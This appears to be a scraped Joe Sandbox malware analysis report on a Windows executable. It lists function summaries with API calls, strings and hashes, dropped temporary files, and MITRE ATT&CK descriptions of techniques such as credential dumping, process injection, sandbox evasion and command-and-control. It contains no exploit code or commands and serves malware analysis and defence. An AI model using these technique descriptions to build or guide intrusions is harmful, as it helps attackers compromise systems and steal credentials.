Opcode ID: 60e86ad390d8e71ad55fd931e791b7d15fdb6d62cfbbe514179b844c5880a900
Instruction ID: d6a2f9c1e42d2edfbf966f3dfd2167b0d21cdf0eff6f9126e9afb140092508c9
Opcode Fuzzy Hash: 60e86ad390d8e71ad55fd931e791b7d15fdb6d62cfbbe514179b844c5880a900
Instruction Fuzzy Hash: 261100719007099FC720EF99D88489AFBF8FF08310B50862FE58AD7611D771AA45CF90

Function 0065C57D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005D2612: GetWindowLongW.USER32(?,000000EB), ref: 005D2623

DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,0060B93A,?,?,?), ref: 0065C5F1

Part of subcall function 005D25DB: GetWindowLongW.USER32(?,000000EB), ref: 005D25EC

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0065C5D7

Strings

P[, xrefs: 0065C5B6

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: LongWindow$MessageProcSend
String ID: P[
API String ID: 982171247-2517523118
Opcode ID: 8f6b89752f19195f44a46894bf468bbd7e2639116cace58118cd9e414cefc5c1
Instruction ID: 999c3daec69e5372a66863c8699d82eb24e5606e74992f760206e87e989a367a
Opcode Fuzzy Hash: 8f6b89752f19195f44a46894bf468bbd7e2639116cace58118cd9e414cefc5c1
Instruction Fuzzy Hash: 81019E31200314AFCB229F58DC48E6A3BA7FB95372F140129F9521B6A0DB31A916DB90

Function 00634F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00634F46
_wcscmp.LIBCMT ref: 00634F58

Strings

#32770, xrefs: 00634F52

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 19748771b8484bf5a569b20c6f14e34c85359719a5c23e3986d95f7c4df08fce
Instruction ID: b4ad3bf3fe27048e4662584db2e7e68799db331a289d55dd60a5c04a18fe077d
Opcode Fuzzy Hash: 19748771b8484bf5a569b20c6f14e34c85359719a5c23e3986d95f7c4df08fce
Instruction Fuzzy Hash: B3E0D83260032D2BE720EB99EC49FA7FBACEB85B71F01016BFD04D3151D960AA4587E1

Function 0060B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0060B314: _memset.LIBCMT ref: 0060B321

Part of subcall function 005F0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0060B2F0,?,?,?,005D100A), ref: 005F0945

IsDebuggerPresent.KERNEL32(?,?,?,005D100A), ref: 0060B2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,005D100A), ref: 0060B303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0060B2FE

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: d5edcf2e3e11d15d07f873b6ecf6c1d788e824daba75c9f731eb654a27d87267
Instruction ID: d033620d937b5d92e9f6d462ac8c2c6d89ae19c9a39e1c6f74c5eb4426f76391
Opcode Fuzzy Hash: d5edcf2e3e11d15d07f873b6ecf6c1d788e824daba75c9f731eb654a27d87267
Instruction Fuzzy Hash: 12E06DB02007028BD768DF28D9083477AE9BF00304F14D96EE486C7781E7B4D444CBA1

Function 00655964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0065596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00655981

Part of subcall function 00635244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006352BC

Strings

Shell_TrayWnd, xrefs: 00655967

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 661a6212203a9d8269b9005646cac03b2965b63263a1aeac7d84c13eeb9f0b20
Instruction ID: f504778f8e44f831e8832291187e43cbf3d5f35384efd416c4274ea305894f51
Opcode Fuzzy Hash: 661a6212203a9d8269b9005646cac03b2965b63263a1aeac7d84c13eeb9f0b20
Instruction Fuzzy Hash: 26D0C935384311BBE7A4BB709C0BF976A16AB10B51F011829B34AAB1D0D9E09800C694

Function 00655998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006559AE
PostMessageW.USER32(00000000), ref: 006559B5

Part of subcall function 00635244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006352BC

Strings

Shell_TrayWnd, xrefs: 006559A7

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 935efd0aab38a2a55bfb5c88cc4c48841e02606009ec6981344950c5878682dd
Instruction ID: 4943e2638058c884eb7d4f177719c4c5f52e06463495f59e837c0448e4cd7fb9
Opcode Fuzzy Hash: 935efd0aab38a2a55bfb5c88cc4c48841e02606009ec6981344950c5878682dd
Instruction Fuzzy Hash: 84D0C9313C0311BBE7A4BB709C0BF976616AB14B51F011829B346AB1D0D9E0A800C698

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report M7XS5C07kV.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\10O4645j

C:\Users\user\AppData\Local\Temp\Melber

C:\Users\user\AppData\Local\Temp\autF412.tmp

C:\Users\user\AppData\Local\Temp\autF441.tmp

C:\Users\user\AppData\Local\Temp\konked

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
M7XS5C07kV.exe

Function 005D3B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Function 005D49A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 005D4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00639155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 005D3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Function 005D3A46 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Function 005D3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 005D708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 005D3633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Function 005D3766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Function 005DF76F Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 168
comCOMMON

Function 00F25640 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre